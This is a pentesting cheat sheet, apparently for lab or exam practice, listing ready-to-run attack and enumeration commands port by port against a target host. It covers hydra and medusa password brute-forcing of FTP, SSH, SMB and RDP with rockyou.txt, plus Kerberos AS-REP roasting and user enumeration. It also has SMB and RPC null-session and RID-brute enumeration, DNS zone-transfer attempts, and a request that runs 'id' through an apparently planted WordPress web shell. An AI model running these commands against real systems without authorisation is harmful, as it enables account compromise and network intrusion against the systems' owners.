### Port 21 (FTP)
ftp anonymous@$rhost #21
nmap --script ftp* -p21 -Pn $rhost #21
hydra -I -l $user -P ~/rockyou.txt -e nsr -t 1 $rhost ftp #21
medusa -u $user -P ~/rockyou.txt -h $rhost -M ftp #21

### Port 2121 (FTP)
ftp anonymous@$rhost -P 2121 #2121
hydra -I -l $user -P ~/rockyou.txt -e nsr -t 1 $rhost ftp -s 2121 #2121
nmap --script ftp* -p2121 -Pn $rhost #2121

### Port 22 (SSH)
hydra -I -l $user -P ~/rockyou.txt -e nsr -t 1 $rhost ssh #22
medusa -u $user -P ~/rockyou.txt -h $rhost -M ssh #22

### Port 25 (SMTP)
smtp-user-enum -U /seclists/Usernames/Names/names.txt -t $rhost -m 150 #25
smtp-user-enum -M VRFY -w 30 -U users.txt -t $rhost -v #25
smtp-user-enum -M RCPT -U users.list -D $domain -t $rhost #25

### Port 53 (DNS)
dig $domain @$rhost #53
dig any www.$domain #53
dig axfr $domain @$rhost #53
dig axfr internal.$domain @$rhost #53
dig axfr ns1.$domain @$rhost @ns.$domain #53

### Port 80 (HTTP)
anyHTTP including 8080 etc
locate admin portals etc using ffuf or google
curl -s http://$rhost/robots.txt
curl -s http://$rhost | batcat -s --plain #80
open http://$rhost #80
ffuf parameter fuzzing - dirsearch, file extensions such as php, txt, zip etc #80
wpscan --url http://$rhost/wordPressSiteLocation? -e ap,at,u --plugins-detection aggressive -t 20 #80
curl -s http://blog.$domain/ | grep -e 'WordPress' -e 'plugins' -e 'themes' #80
curl -s http://blog.$domain/?p=1 | grep -e 'WordPress' -e 'plugins' -e 'themes' #80
curl -s http://blog.$domain/wp-content/themes/twentynineteen/404.php?0=id #80
cadaver http://$rhost/ITproject #80
cadaver http://$rhost/maybe-it-cred-requires #80

### Port 88 (Kerberos)
impacket-GetNPUsers -no-pass -usersfile users.txt $domain -dc-ip $rhost #88
kerbrute userenum --domain $shortdomain users.txt --dc $rhost #88

### Port 135 (RPC)
rpcclient -U "" $rhost -c "enumdomusers" #135
rpcclient -U $shortdomain/$user $rhost #135
rpcclient -U '' $rhost #135
rpcclient -U "" $rhost #135
rpcclient -U''%'' $rhost #135

### Port 389 (LDAP)
jxplorer #389
nmap -p389 --script "ldap* and not brute" -n -Pn $rhost #389
Edit> ldapsearch -x -H "ldap://$rhost" -b "CN=$computer_name,DC=$shortdomain,DC=c0mmm" "objectclass=*" | grep description #389
Edit> ldapsearch -x -H "ldap://$rhost" -b "DC=$shortdomain,DC=c0mmm" "objectclass=*" | grep description #389
Edit> nmap -p389 --script ldap-brute --script-args ldap.base='"cn=users,dc=contoso,dc=com"' -Pn $rhost

### Port 443 (HTTPS)
wafw00f -v https://$domain #443

### Port 445 (SMB)
smbclient -N -L //$rhost/ #445
nmap --script smb-vuln* -p139,445 -Pn $rhost
enum4linux-ng -AC $rhost #445
nxc smb $rhost -u 'anonymous' -p '' --rid-brute #445
nxc smb $rhost -u "" -p "" --users #445
nxc smb $rhost -u "" -p "" --pass-pol #445
impacket-lookupsid anonymous@$rhost #445
hydra -I -l $user -P ~/rockyou.txt -e nsr -t 1 $rhost smb #445

### Port 636 (LDAPS)
# Note: No LDAPS commands were provided in the original list  #636

### Port 3306 (MySQL)
mysql -u $user -h $rhost #3306 try with no password

### Port 3389 (RDP)
hydra -I -l $user -P ~/rockyou.txt -e nsr -t 1 $rhost rdp #3389

### Port 6379 (Redis)
redis-cli -h $rhost #6379
